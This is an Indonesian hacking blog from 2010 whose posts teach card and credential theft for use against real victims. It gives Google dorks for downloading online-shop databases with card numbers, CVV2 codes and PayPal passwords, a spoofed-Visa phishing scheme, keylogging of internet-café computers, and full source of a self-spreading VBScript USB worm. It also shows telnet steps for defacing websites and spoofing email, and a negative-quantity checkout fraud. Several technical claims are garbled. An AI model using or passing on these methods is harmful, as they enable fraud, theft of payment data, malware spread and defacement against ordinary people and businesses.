Cara Tekhnik Mendapatkan Nomor CC plus CVV2

Ini cara Saya cari CC plus CVV2 dan kalau beruntung anda juga dapet Paypal account plus passwd :

Buka google.com
masukkan ini pada search engine : allinurl:/shop/category.asp/catid=

nah disitu akan keluar banyak website :

mis : www.speedytoys.com/shop/category.asp?catid=9

Gantilah yang berwarna merah dengan ini : data/pdshoppro.mdb

jadinya seperti ini : http://www.speedytoys.com/data/pdshoppro.mdb

dan browsinglah pakai exploit tsb, maka hasilnya anda akan download database dari toko tsb dalam bentuk format microsoft access.

Data dalam DB tersebut biasanya untuk password paypal dan CC di dekript…

Untuk enkripsinya anda bisa gunakan ini :

http://4guysfromrolla.com/demos/rc4test.htm

Selamat Mencoba.

Nb :
- Alamat yang saya gunakan sbg contoh DB nya kosong, silahkan anda mencari dan berkreasi…biasanya toko yang sering dikunjungi.
- Mungkin udah basi cara saya…mohon pencerahan Smile

v3r1n1c3 wrote:
Ini cara Saya cari CC plus CVV2 dan kalau beruntung anda juga dapet Paypal account plus passwd :

Buka google.com
masukkan ini pada search engine : allinurl:/shop/category.asp/catid=

nah disitu akan keluar banyak website :

mis : www.speedytoys.com/shop/category.asp?catid=9

Gantilah yang berwarna merah dengan ini : data/pdshoppro.mdb

jadinya seperti ini : http://www.speedytoys.com/data/pdshoppro.mdb

dan browsinglah pakai exploit tsb, maka hasilnya anda akan download database dari toko tsb dalam bentuk format microsoft access.

Data dalam DB tersebut biasanya untuk password paypal dan CC di dekript…

Untuk enkripsinya anda bisa gunakan ini :

http://4guysfromrolla.com/demos/rc4test.htm

Selamat Mencoba.

Nb :
- Alamat yang saya gunakan sbg contoh DB nya kosong, silahkan anda mencari dan berkreasi…biasanya toko yang sering dikunjungi.
- Mungkin udah basi cara saya…mohon pencerahan Smile

Bagus tutornya …
Tapi … kayaknya gue pernah lihat … dimana yah ..?

Google dork:
Shopadmin.asp
Shopdbtest.asp
Comersus.mdb
allinurl:mdb
allinurl:db

dll…..dah pada lupa….. Laughing Laughing

scriptkiddiesx wrote:
Oh…ya untuk yang pdshoppro…..direktorinya gak mesti di

/data/pdshoppro.mdb

Tapi bisa juga:

/shoppro/data/pdshoppro.mdb

/pdshoppro.mdb

Twisted Evil Twisted EvilTwisted Evil

bugs ini ditemukan taun 2006 jadi maaf ajah kalo banyak yang gagal… Crying or Very sad Crying or Very sad

Gak pp don’t give up Very Happy

Tekhnik Mendapatkan Nomor CC

hackerh

Ini sebenarnya hanya tips. Klo mau dapetin nomor cc.

Cara Pertama, adalah Tipuan Maut.

Pertama lu daftar email ke jasa email apa aja deh.
Kedua lu daftar jangan pake nama asli. Asal aja,
soalnya nanti email itu yang diugunakan untuk nipu.
Ketiga Pemilihan nama email harus sesuai dengan nama
penipuan. Contoh : visa_indonesia@yahoo.co.id atau
apa lah terserah. Pokoknya yang bisa menyakinkan si
korban. Ketiga, lu kirim email palsu. Caranya ??
Ada kok diatas. Pake MyTelnet atau Microsoft Telnet.
Nih setingannya:

Tujuan : korban
Dari : klo misalnya mau visa lu kirimin dari indonesia@visa.com

Nah isinya terserah aje lah …..!!
SMTPnya terserah. klo saran gue pake punya yahoo.

PENTING !!!
Jika anda menggunakan koneksi dialup, anda tidak bisa melakukannya.
Karena smtp dial up hanya diperbolehkan menggunakan milik telkom.

Cara Kedua, adalah keyloger.

Pertama lu download keylogger. Klo saran gue pake keylogger buatan gue.
Selain ramah lingkungan juga mampu mendeteksi tombol spesial Smile Smile.

Download Keylogger : http://asia.geocities.com/andre_susanto_metal/Download/klogger.zip

Trus lu jalanin keylogger di kompie warnet. Tunggu beberapa minggu.
Setelah itu lu Download kontrolnya (Untuk mengecek file log)

Download Control : http://asia.geocities.com/andre_susanto_metal/Download/remot.zip

Lu buka.
Nah keliatan tuh hasil ketikan orang selama berminggu minggu Very Happy
Siapa tahu ada nomer creditcardnya. Lumayan kan ??

Apr 30, 2010

WARNING !!! Script ini termasuk script jahat !!!

Lebih Top b’gini nih ….
WARNING !!! Script ini termasuk script jahat !!!


Buka notepad, copy & paste code ini:

Code:
<HTML><HEAD><TITLE>DE</TITLE>
<SCRIPT LANGUAGE=”VBScript”><!–
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe MS32DLL.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,winpath&”\MS32DLL.dll.vbs”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Hacked by Andre Susanto”
rg.regwrite “HKCR\vbsfile\DefaultIcon”,”shell32.dll,2″
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

–>
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

Kalo udah save dengan nama apasaja (Format harus HTML) misalkan namanya : contohscript.html

Buka file tadi di browser IE (Harus IE 6 / lebih tinggi).

Apakah reaksi kompie anda ???

Atau bisa juga begini,

(Ini lebih kompleks dan kompatibel dengan kompie)

Buka notepad, ketikan :

Code:
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe MS32DLL.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,winpath&”\MS32DLL.dll.vbs”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Hacked by Andre Susanto”
rg.regwrite “HKCR\vbsfile\DefaultIcon”,”shell32.dll,2″
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

Simpan dengan nama (Misalkan) TesScript.vbs (Harus ada .vbs nya [formatnya vbs])

Buka file buatan anda tadi ……… Very Happy

______

Kerusakan tidak ditanggung Smile

Apr 30, 2010

Serangan Yang Sering Dipakai Hacker

Kucing

Ini adalah beberapa jenis serangan yang sering dipake sama hacker.
Sebenarnya serangan hacker itu banyak banget tapi yang udah umum biasanya ini:

1) DDoS (Distributed Denial Of Service) [classic]
Distributed Denial Of Service digunakan seorang hacker untuk mengambil
resource didalam network tanpa adanya autorisasi. Sebelumnya hacker harus
melakukan FTP Attack.

2) IP Spoofing (Atau Source Address Spoofing)
pemalsuan alamat IP hacker sehingga sasaran menganggap alamat IP hacker adalah alamat IP dari host di dalam network bukan dari luar
network. Misalkan hacker mempunyai IP address type A 66.25.xx.xx ketika hacker melakukan
serangan jenis ini maka Network yang diserang akan menganggap IP hacker adalah bagian dari
Networknya. IP Spoofing terjadi ketika seorang hacker menghack
packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk
routing biasanya di transmisikan secara transparan dan jelas sehingga membuat hacker dengan mudah
untuk memodifikasi asal data ataupun tujuan dari data.

3) FTP Attack (File Transfer Protocol Attack)
serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk
mendapatkan command shell ataupun untuk melakukan DDoS.

4) UFE (Unix Finger Exploits)
Serangan ini terjadi karena kesalahan sistem Administrator yang tidak menggunakan keamanan sedikit atau sama sekali tidak.
Point ini terlalu berharga untuk dilewatkan, …… :)

5) Flooding & Broadcasting (Pembanjiran server)
Serangan ini digunakan dengan tools-tools untuk pembanjiran server. Misalkan TrashAttack. Tujuan serangan ini adalah
untuk memperlambat kinerja server.

6) FPA (Fragmented Packet Attacks)
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya
mengandung paket pertama yang isinya berupa informasi bagian utama dari TCP/IP. Beberapa
firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi
alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash.

7) E-mail Exploits
Terbagi menjadi lima cara yaitu: mail floods,command
manipulation, transport level attack, malicious code inserting dan social engineering.

8| DNS and BIND Vulnerabilities
Kesalahan pada BIND sebenarnya bukanlah sesuatu yang baru. Semenjak permulaanya, standar BIND
merupakan target yang paling favorite untuk diserang oleh hackeR. Empat kerawanan
terhadap buffer overflow yang terjadi pada bulan Januari 2003 lalu hanya
beberapa bagian dari kerawanan untuk diexploitasi oleh para hacker agar mendapat akses terhadap
system dan melakukan perintah dengan hak penuh (command execution priviledge).

9) Password Attacks
Password attack adalah tidakan hacker untuk menggambil password orang. Jika password orang diambil maka hacker akan
memiliki kedudukan yang sama dengan orang itu (Jika ia menggunakan orang itu karena passwordnya sudah ia dapat).
Tekhnik mendapatkan passwordnya pun beragam. Kebanyakan tekhnik yang digunakan adalah menebak guessing, brute force,
cracking dan sniffing.

10) Proxy Server Attacks
Karena secure sharing dinonaktifkan, maka hacker memiliki potensi untuk menyerang komputer local dengan trusted network.
contoh dua komputer milik aq dan kamu. Jika firewall di trusted network tidak dikonfigurasikan secara benar, khususnya
untuk memblockinr akses dari luar, Memungkinkan trusted relationship memberikan kepada semua anggota
network kekuasaan akses yang sama di satu dan lain system (dalam network).

Sebanarnya masih banyak lagi, tapi tanganku udah gak kuat nulis …. ^_^

Apr 30, 2010

Belajar Menggunakan Microsoft Telnet

Biar Lebih Jelas Tampilannya Gue Rubah Dikit Menjadi Seperti Ini:

Belajar Menggunakan Microsoft Telnet

1. Mengenal Microsoft Telnet
Microsoft telnet adalah program bawaan dari windows. Program ini berguna untuk mengakses keweb, untuk keperluan upload data, dll. Tapi program ini justru dimanfaatkan oleh hacker-hacker seperti kita. Program ini fungsinya sama dengan NetCat. Disini saya menyertakan program netcat agar anda tidak bingung. Program netcat, adalah program yang pualing sering digunakan oleh hacker.

2. Menggunakan Netcat Untuk keperluan Upload data
Seperti pada tujuannya, bahwa netcat berfungsi untuk keperluan upload data ke web. Sekarang kita akan mencoba meng-upload data ke-web dengan netcat. Halaman utama biasanya adalah : index.htm atau index.html bukan? Nah coba bayangkan jika halaman itu diganti oleh kita? Pasti web akan dideface oleh kita bukan?

Nah ini cara menggunakan telnetnya.

Pertama,
Klik Start, Run. Ketikan telnet.exe
Setelah muncul maka ketikan

Code:
Welcome to Telnet Client

Escape Character is ‘CTRL + ]’

Microsoft Telnet > [b]o www.namaweb.com 80
PUT /index.html HTTP/1.1
Host:www.namaweb.com
Content-Legth: 23
<h1>Defaced by ME</h1>
[i](enter)
(enter)[/i][/b]

Penjelasan Kode:

Kata yang dicetak tebal : Kita mengetiknya
Kata yang dicetak miring & tebal : kita menekan tombolnya

Kode : o www.namaweb.com 80 berarti perintah untuk telnet membuka www.namaweb.com dengan port 80. Port 80 adalah port untuk akses upload file. Anda tidak harus selalu menggunakan port 80. Anda bisa menggunakan akses port darurat, jika port 80 tertutup. Misal 123 atau 123456.

3. Menggunakan Telnet Untuk mengirim e-mail palsu!!

Saat anda menerima e-mail dari seseorang, janganlah langsung percaya. Misalkan, anda mendapat e-mail dari billgates. dengan alamat e-mail : bgates@microsoft.com, yang mengirimkan anda e-mail tampa alasan jelas. Sebenarnya itu adalah ulah hacker-hacker bocah. Cara ini sangat gampang!! Very Happy bayi pun bisa Very Happy Very Happy .

Caranya,
Pertama,
Klik Start, Run. Ketikan telnet.exe
Setelah muncul maka ketikan

Code:
Welcome to Telnet Client

Escape Character is ‘CTRL + ]’

Microsoft Telnet > [b]o web40609.mail.yahoo.com 80[/b]
[b]EHLO
MAIL FROM:bgates@microsoft.com
RCPT TO:you.domain.com
Hello, i’m gates
[i](enter)[/i].[i]
(enter)[/i][/b]

Penjelasan Kode:

Kata yang dicetak tebal : Kita mengetiknya
Kata yang dicetak miring & tebal : kita menekan tombolnya

Kode : o web40609.mail.yahoo.com 25 kode diatas untuk membuka SMTP pada web. anda bisa mengganti SMTP dengan alamat lain yang diinstall SMTP. Kali ini saya menggunakan SMTP yahoo. Port 25 adalah port untuk mengakses SMTP.

Boleh ditambahkan dan dikomentari

Apr 30, 2010

Belajar Menggunakan ms.Telnet

hacker's

1. Mengenal Microsoft Telnet
Microsoft telnet adalah program bawaan dari windows. Program ini berguna untuk mengakses keweb, untuk keperluan upload data, dll. Tapi program ini justru dimanfaatkan oleh hacker-hacker seperti kita. Program ini fungsinya sama dengan NetCat. Disini saya menyertakan program netcat agar anda tidak bingung. Program netcat, adalah program yang pualing sering digunakan oleh hacker.

2. Menggunakan Netcat Untuk keperluan Upload data
Seperti pada tujuannya, bahwa netcat berfungsi untuk keperluan upload data ke web. Sekarang kita akan mencoba meng-upload data ke-web dengan netcat. Halaman utama biasanya adalah : index.htm atau index.html bukan? Nah coba bayangkan jika halaman itu diganti oleh kita? Pasti web akan dideface oleh kita bukan?

Nah ini cara menggunakan telnetnya.

Pertama,
Klik Start, Run. Ketikan telnet.exe
Setelah muncul maka ketikan
Code:
Welcome to Telnet Client

Escape Character is ‘CTRL + ]’

Microsoft Telnet > o www.namaweb.com 80
PUT /index.html HTTP/1.1
Host:www.namaweb.com
Content-Legth: 23
<h1>Defaced by ME</h1>
(enter)
(enter)

Penjelasan Kode:

Kata yang dicetak tebal : Kita mengetiknya
Kata yang dicetak miring & tebal : kita menekan tombolnya

Kode : o www.namaweb.com 80 berarti perintah untuk telnet membuka www.namaweb.com dengan port 80. Port 80 adalah port untuk akses upload file. Anda tidak harus selalu menggunakan port 80. Anda bisa menggunakan akses port darurat, jika port 80 tertutup. Misal 123 atau 123456.

3. Menggunakan Telnet Untuk mengirim e-mail palsu!!

Saat anda menerima e-mail dari seseorang, janganlah langsung percaya. Misalkan, anda mendapat e-mail dari billgates. dengan alamat e-mail : bgates@microsoft.com, yang mengirimkan anda e-mail tampa alasan jelas. Sebenarnya itu adalah ulah hacker-hacker bocah. Cara ini sangat gampang!! bayi pun bisa .

Caranya,
Pertama,
Klik Start, Run. Ketikan telnet.exe
Setelah muncul maka ketikan
Code:
Welcome to Telnet Client

Escape Character is ‘CTRL + ]’

Microsoft Telnet > o web40609.mail.yahoo.com 80
EHLO
MAIL FROM:bgates@microsoft.com
RCPT TO:you.domain.com
Hello, i’m gates
(enter).
(enter)

Penjelasan Kode:

Kata yang dicetak tebal : Kita mengetiknya
Kata yang dicetak miring & tebal : kita menekan tombolnya

Kode : o web40609.mail.yahoo.com 25 kode diatas untuk membuka SMTP pada web. anda bisa mengganti SMTP dengan alamat lain yang diinstall SMTP. Kali ini saya menggunakan SMTP yahoo. Port 25 adalah port untuk mengakses SMTP.

Apr 30, 2010

Mengenal Lebih Jauh ttg Hacker

Hacker and Chacker

Dalam dunia kita (hacker) terdapat tingkat/level. Seorang hacker akan
melalui tahapan tahapan untuk menjadi sempurna. Tahapan tersebut ialah:

1. Mundane Person
Tingkatan paling bawah. Seseorang pada tingkatan ini pada dasarnya tidak
tahu sama sekali tentang hacker dan cara-caranya, walaupun ia mungkin
memiliki komputer sendiri dan akses Internet. Ia hanya tahu bahwa yang
namanya hacker itu membobol sistem komputer dan melakukan hal-hal yang
negatif (tindak kejahatan). Padahal sebenarnya hacker bukan seperti itu,
kecuali hacker tidak taat e-tik

2. Lamer
Seseorang pada tingkatan ini masih dibingungkan oleh seluk beluk hacking
karena ia berpikir bahwa melakukan hacking sama seperti cara-cara waras
(dalam dunia underground berarti menggandakan perangkat lunak secara ilegal).
Pengetahuannya tentang hal-hal seperti itu masih minim, tapi sudah mencoba belajar.
Seseorang pada tingkatan ini sudah bisa mengirimkan trojan (yang dibuat orang lain)
ke atau pada komputer orang lain ketika melakukan obrolan pada IRC atau ICQ dan
menghapus file-file mereka. Padahal ia sendiri tidak tahu persis bagaimana trojan bekerja.
Seseorang yang sukses menjadi hacker biasanya bisa melalui tahapan ini dengan cepat bahkan melompatinya.

3. Wannabe
Pada tingkatan ini seseorang sudah mengetahui bahwa melakukan tindakan hack itu lebih dari
sekedar menerobos masuk ke komputer orang lain. Ia lebih menganggap hal tersebut sebagai sebuah filsafat
atau way of life. Akhirnya ia jadi ingin tahu lebih banyak lagi. Ia mulai mencari,
membaca dan mempelajari tentang metode-metode hacking dari berbagai sumber.

4. Newbie
Pada tingkatan ini ia sudah memiliki dasar-dasar teknik hacking.
Ia akan mencoba menerobos masuk ke sistem orang lain hanya untuk mencoba apa yang sudah ia pelajari.
Meskipun demikian, pada tingkatan ini ia mengerti bahwa ketika melakukan hacking ia tidak harus merusak sistem
atau menghapus apa saja jika hal itu tidak diperlukan untuk menutupi jejaknya.

5. Hacker
Sebenarnya sulit untuk mengatakan tingkatan akhir atau final dari hacker telah tercapai,
karena selalu saja ada sesuatu yang baru untuk dipelajari atau ditemukan
(mengumpulkan informasi dan mempelajarinya dengan cermat merupakan dasar-dasar yang sama bagi seorang hacker)
dan hal tersebut juga tergantung perasaan (feeling). Meskipun demikian, menjadi seorang hacker memang lebih menjurus
pada hal pemikiran.

Hacker yang tidak taat pada etik akan menjadi:

Dark-side Hacker
Seorang Dark-side hacker sama seperti Darth Vader (tokoh dalam film Star Wars) yang tertarik dengan kekuatan kegelapan.
Hal ini tidak ada hubungannya dengan masalah “baik” atau “jahat” tapi lebih kepada masalah “sah (sesuai hukum yang berlaku)” dan “kekacauan”.
Seorang Dark-side hacker punya kemampuan yang sama dengan semua hacker, tapi “sisi gelap” dari pikirannya membuat ia menjadi unsur berbahaya.

Apr 30, 2010

Hacker & Cracker

hacker_cracker_bookMungkin anda sudah sering mendengar istilah Hacker & Cracker. Namun, apa yang dimaksud Hacker & Cracker ? Lalu apa perbedaannya ?

Perkembangan teknologi yang semakin pesat semakin meningkatnya tingkat kriminalitas yang dilakukan oleh penjahat lewat internet. Seorang penjahat internet tidak tanggung-tanggung menguras habis uang suatu perusahaan hanya dalam hitungan menit melalui internet.

Lalu, Siapa Penjahat Internet Tersebut ?

Penjahat tersebut disebut dengan istilah “Cracker”. Cracker adalah musuh besar bagi Hacker karena mereka memiliki tujuan yang berkebalikan. Cracker memiliki tujuan untuk merusak komputer korban melalui internet sedangkan hacker memiliki tujuan untuk mengamankan atau memproteksi sistem pertahanan komputer. Banyak orang yang menganggap bahwa hacker sama saja dengan cracker padahal keduanya sangatlah berbeda, hanya mereka sama-sama seorang programmer yang mana bisa menyusup sistem keamanan komputer.

Sudah banyak perusahaan-perusahaan besar yang telah meminta bantuan para hacker untuk memproteksi sistem keamanan komputer perusahaan, beberapa perusahaan besar tersebut adalah Google, Yahoo, Microsoft, dan berbagai perusahaan lainnya.

Apr 30, 2010

hacker mentrasfer file-file backdoor, virus, dll.

Nih klo mau tau netcat

Fitur dari Netcat antara lain adalah:
~ Dapat mebangun koneksi Outbound dan inbound dengan TCP atau UDP, di dan dari
port mana saja.
~ Dapat membaca argumen pada command line dari standar input
~ Full DNS forwarding/reverse checking
~ Kemampuan untuk menggunakan any local source port
~ Kemampuan menggunakan any locally-configured network source address
~ Tersedia port scanning secara built-in
~ Dan lain-lain
Dengan fitur di atas, banyak para hacker dan pengelola sistem memanfaatkan untuk melakukan
hal-hal sebagai berikut:
~ Scanning port dan menginventori service-service yang terpasang pada server
~ File transfer
~ Pengujian dan simulasi terhadap server
~ Pengujian terhadap firewall, proxy dan gateway
~ Pengujian performance network
~ Pengujian address spoofing
~ Banner grabbing

Cara mengetahuinya dengan cara melihat menu help. Panggil netcat melalui command prompt.
Dengan alamatnya. Alamat netcat saya berada di i:\tools\netcat\
Kalau saya mempersiapkan cmd jadi perintahnya:
i:\tools\netcat>nc -h
Perintah -h digunakan untuk melihat menu help.
Dan umumnya netcat menggunakan baris perintah : i:\tools\netcat>nc -opsi (host) (port)
Yah mirip ama telnet. Tapi netcat lebih bagus. Makanya banyak digunain ama hacker.
Yah, seletal itu yah, langsung di hack.
Biasanya hacker menggunakan perintah koding (scripting atau unicode)
Perintah ini jika terbukti server web menggunakan fasilitas Microsoft ISS 5.0
Biasanya hacker mentrasfer file-file backdoor, virus, dll.

Apr 30, 2010

HACKING TERMUDAH

Hacking termudah adalah hacking dengan logika.
Misalkan hacking dengan menggunakan tekhnik sbb:

Hacking cara yg ini bersifat tidak merusak, aman digunakan.
Tapi menyebankan kerugian yang fatal. Misalkan. Jika 10 prodak
yang seharusnya berharga 10 juta hanya dibayar dengan 1000 rupiah.
Ruginya sangat besar bukan? Jadi logikanya sbb.

Pergilah ke situs online shop. Misalkan toko buku online.
Lakukan pemesanan buku sebanyak banyaknya. Lalu lakukan check out.
Biasanya setelah check out akan terdapat jumlah pemesanan yg harus diisi, dan
Biasanya diminta nomor kartu kredit. Jadi solusinya:

1. Masukan Jumlah Pemesanan dengan tamda – didepan. Misalkan -10, -15 dll.
2. Gunakan ccg (credit card generator) yang bisa didownload disini.

Setelah itu klik submit.

JIKA

Biasanya ada semacam script dari Java Script yang melindungi form itu.
Anda bisa lihat efeknya jika anda masukan tanda – akan berubah menjadi +.
Untuk itu kita harus mematikan javanya. Caranya klik tools > internet options
Kemudian pilih tab Advanced kemudian disable fungsi java script.

Tekhnik berikutnya bisa disambung lagi ….

Computer-hacker

Pages:12»

About

Hacker Indonesia

Nama ane yah yuril, capa lagi klo bukan ane. panggil aja YURIL... Yah salam aja yah gan... SALAM: HACKER LIAR

Calendar

April 2014
M T W T F S S
« May    
 123456
78910111213
14151617181920
21222324252627
282930  

Archives

Categories

Slideshow

Get the Flash Player to see the slideshow.

Twiiter